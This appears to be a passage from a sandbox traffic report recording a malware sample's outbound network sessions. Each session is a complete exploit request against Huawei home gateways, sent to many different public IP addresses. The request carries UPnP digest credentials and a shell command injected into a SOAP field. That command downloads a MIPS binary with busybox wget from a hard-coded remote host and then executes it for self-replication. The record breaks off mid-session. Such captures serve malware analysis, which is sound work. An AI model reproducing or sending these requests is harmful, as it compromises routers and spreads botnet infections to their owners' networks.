                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2826192.168.2.2339772157.106.61.13637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.650326014 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2827192.168.2.2337502157.154.25.14937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.650345087 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2828192.168.2.2360866197.158.168.13137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.650345087 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2829192.168.2.235746245.127.246.18437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.650383949 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2830192.168.2.2354304172.184.158.21537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.650619030 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2831192.168.2.2338468157.208.215.1037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.650638103 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2832192.168.2.2338822157.204.45.1237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.650774002 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2833192.168.2.234680017.133.96.21937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.650775909 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2834192.168.2.2341042183.112.57.16737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.650815010 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2835192.168.2.2349354197.70.11.7137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.650827885 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
